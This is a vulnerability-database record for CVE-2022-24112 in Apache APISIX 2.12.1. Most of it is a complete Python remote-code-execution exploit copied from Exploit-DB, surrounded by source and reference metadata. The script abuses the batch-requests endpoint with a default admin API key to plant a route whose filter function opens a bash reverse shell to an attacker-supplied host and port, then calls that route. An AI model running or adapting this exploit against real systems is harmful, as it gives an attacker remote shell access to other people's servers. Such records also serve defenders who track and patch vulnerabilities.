ID

VAR-E-202203-0014


CVE

cve_id:CVE-2022-24112

Trust: 2.0

cve_id:CVE-2020-13945

Trust: 0.5

sources: PACKETSTORM: 166228 // PACKETSTORM: 166328 // EXPLOIT-DB: 50829

EDB ID

50829


TITLE

Apache APISIX 2.12.1 - Remote Code Execution (RCE) - Multiple remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 50829

DESCRIPTION

Apache APISIX 2.12.1 - Remote Code Execution (RCE). CVE-2022-24112. remote exploit for Multiple platform

Trust: 0.6

sources: EXPLOIT-DB: 50829

AFFECTED PRODUCTS

vendor: apache, model: apisix, scope: eq, version: 2.12.1

Trust: 2.1

vendor: apache, model: apisix, scope: -, version: -

Trust: 0.5

sources: PACKETSTORM: 166228 // PACKETSTORM: 166328 // EXPLOIT-DB: 50829 // EDBNET: 105259

EXPLOIT

# Exploit Title: Apache APISIX 2.12.1 - Remote Code Execution (RCE)
# Date: 2022-03-16
# Exploit Author: Ven3xy
# Vendor Homepage: https://apisix.apache.org/
# Version: Apache APISIX 1.3 – 2.12.1
# Tested on: CentOS 7
# CVE : CVE-2022-24112

import requests
import sys

class color:
    HEADER = '\033[95m'
    IMPORTANT = '\33[35m'
    NOTICE = '\033[33m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    RED = '\033[91m'
    END = '\033[0m'
    UNDERLINE = '\033[4m'
    LOGGING = '\33[34m'

color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING]

def banner():
    run = color_random[6]+'''\n . ,
_.._ * __*\./ ___ _ \./._ | _ *-+-
(_][_)|_) |/'\ (/,/'\[_)|(_)| |
| |
\n'''
    run2 = color_random[2]+'''\t\t(CVE-2022-24112)\n'''
    run3 = color_random[4]+'''{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n'''
    print(run+run2+run3)

if (len(sys.argv) != 4):
    banner()
    print("[!] Usage : ./apisix-exploit.py <target_url> <lhost> <lport>")
    exit()

else:
    banner()
    target_url = sys.argv[1]
    lhost = sys.argv[2]
    lport = sys.argv[3]

headers1 = {
    'Host': '127.0.0.1:8080',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
    'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
    'Accept': '*/*',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/json',
    'Content-Length': '540',
    'Connection': 'close',
}

headers2 = {
    'Host': '127.0.0.1:8080',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
    'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
    'Accept': '*/*',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/json',
    'Connection': 'close',
}

json_data = {
    'headers': {
        'X-Real-IP': '127.0.0.1',
        'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
        'Content-Type': 'application/json',
    },
    'timeout': 1500,
    'pipeline': [
        {
            'path': '/apisix/admin/routes/index',
            'method': 'PUT',
            'body': '{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars) os.execute(\'bash -c \\\\\\"0<&160-;exec 160<>/dev/tcp/'+lhost+'/'+lport+';sh <&160 >&160 2>&160\\\\\\"\'); return true end"}',
        },
    ],
}

response1 = requests.post(target_url+'apisix/batch-requests', headers=headers1, json=json_data, verify=False)

response2 = requests.get(target_url+'rms/fzxewh', headers=headers2, verify=False)

Trust: 1.0

sources: EXPLOIT-DB: 50829

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 50829

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 50829

TYPE

Remote Code Execution (RCE)

Trust: 1.6

sources: EXPLOIT-DB: 50829 // EDBNET: 105259

TAGS

tag:exploit

Trust: 1.0

tag:remote

Trust: 1.0

tag:code execution

Trust: 1.0

sources: PACKETSTORM: 166228 // PACKETSTORM: 166328

CREDITS

Ven3xy

Trust: 0.6

sources: EXPLOIT-DB: 50829

EXTERNAL IDS

db: NVD, id: CVE-2022-24112

Trust: 2.0

db: EXPLOIT-DB, id: 50829

Trust: 1.6

db: EDBNET, id: 105259

Trust: 0.6

db: NVD, id: CVE-2020-13945

Trust: 0.5

db: OPENWALL, id: OSS-SECURITY/2022/02/11/3

Trust: 0.5

db: PACKETSTORM, id: 166228

Trust: 0.5

db: PACKETSTORM, id: 166328

Trust: 0.5

sources: PACKETSTORM: 166228 // PACKETSTORM: 166328 // EXPLOIT-DB: 50829 // EDBNET: 105259

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2022-24112

Trust: 2.0

url:https://www.exploit-db.com/exploits/50829/

Trust: 0.6

url:https://nvd.nist.gov/vuln/detail/cve-2020-13945

Trust: 0.5

sources: PACKETSTORM: 166228 // PACKETSTORM: 166328 // EXPLOIT-DB: 50829 // EDBNET: 105259

SOURCES

db: PACKETSTORM, id: 166228
db: PACKETSTORM, id: 166328
db: EXPLOIT-DB, id: 50829
db: EDBNET, id: 105259

LAST UPDATE DATE

2022-07-27T09:34:42.728000+00:00


SOURCES RELEASE DATE

db: PACKETSTORM, id: 166228, date: 2022-03-07T16:27:59
db: PACKETSTORM, id: 166328, date: 2022-03-16T16:46:44
db: EXPLOIT-DB, id: 50829, date: 2022-03-16T00:00:00
db: EDBNET, id: 105259, date: 2022-03-16T00:00:00